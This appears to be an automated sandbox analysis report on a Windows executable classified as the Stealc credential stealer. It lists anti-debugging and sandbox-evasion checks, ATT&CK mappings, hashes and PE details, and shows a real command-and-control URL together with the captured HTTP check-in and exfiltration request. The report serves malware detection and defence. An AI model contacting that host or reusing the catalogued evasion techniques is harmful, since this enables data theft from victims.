              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D74B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D7D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00D7DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D616B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D616A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D81BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00D81BF0
              Source: file.exe, file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1831342123.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25664
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25536
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25673
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25518
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25685
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25561
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64A60 VirtualProtect 00000000,00000004,00000100,?0_2_00D64A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D86390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86390 mov eax, dword ptr fs:[00000030h]0_2_00D86390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D82AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00D82AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D846A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_00D846A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D84610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00D84610
              Source: file.exe, file.exe, 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: L{[Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D82D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D82B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00D82B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D82A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D82A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D82C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D82C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206b0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206bfile.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.215.113.206file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/Kfile.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/wsfile.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1561500
                          Start date and time:2024-11-23 15:36:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 12s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 79%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 123
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:36:58Task SchedulerRun new task: {D77F0804-8B14-41AB-B70B-92F398816110} path:

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, CryptbotBrowse
                          • 185.215.113.43

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.943329851472194
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'840'128 bytes
                          MD5:4cc6d797a10ba2b6f877fc893f459f67
                          SHA1:a0c6551d531895b1d716a6f2e89da0cd0721f35a
                          SHA256:2e9caa8ec6faf2bfcc89a031cc111e60654107d5979a197d1727266dffbc2b1a
                          SHA512:989107424e4b86ca8b4e772129314a922d2a9fe2ade885f28ae56bff2fce3d8aa1063917c6cb31dde8ff56e50fd9d77738e18d07173cf1bef32e78c1fe397bde
                          SSDEEP:49152:kLZosPz+2mGYY150iW1ZDU/rCLRUYwmWX96nItpOv:0osDmGYEYvDUA2DtpO
                          TLSH:C98533700EBB615EF71C877CB7EADB0685982C9CA2E5AF5F8D0091CC60A751E53CBA11
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xaa7000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FB8DCF0C57Ah
                          pslld mm3, qword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add eax, 0000000Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add eax, 0000000Ah
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edx], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [esi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, byte ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          sbb al, byte ptr [00000000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push es
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          inc eax
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x16200a82798516d23817454d4bff6563de35bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x2b00x20098990617294d0401904e02229ad3175fFalse0.80078125data6.0985334217632765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2b20000x20034ae26145cf5773c788e54958969b332unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          agjwaxpt0x4fe0000x1a80000x1a760019a098a4c8054381f83b07eb545bcf56False0.9946596130425155data7.953344227799623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          qyczlbbe0x6a60000x10000x40026f63ebf3701c237a4d0b2bf63470e50False0.755859375data5.948443161757515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6a70000x30000x2200a1d8b495aa471f11f6083d1cbd3c26d8False0.04607077205882353DOS executable (COM)0.4511548750455626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x6a524c0x256ASCII text, with CRLF line terminators0.5100334448160535

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-11-23T15:37:13.432950+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 23, 2024 15:37:11.406693935 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:11.527741909 CET8049730185.215.113.206192.168.2.4
                          Nov 23, 2024 15:37:11.527883053 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:11.528079033 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:11.647567034 CET8049730185.215.113.206192.168.2.4
                          Nov 23, 2024 15:37:12.962486982 CET8049730185.215.113.206192.168.2.4
                          Nov 23, 2024 15:37:12.965274096 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:12.967936039 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:13.087532997 CET8049730185.215.113.206192.168.2.4
                          Nov 23, 2024 15:37:13.432811022 CET8049730185.215.113.206192.168.2.4
                          Nov 23, 2024 15:37:13.432950020 CET4973080192.168.2.4185.215.113.206
                          Nov 23, 2024 15:37:17.482475996 CET4973080192.168.2.4185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.215.113.206807488C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Nov 23, 2024 15:37:11.528079033 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Nov 23, 2024 15:37:12.962486982 CET203INHTTP/1.1 200 OK
                          Date: Sat, 23 Nov 2024 14:37:12 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Nov 23, 2024 15:37:12.967936039 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
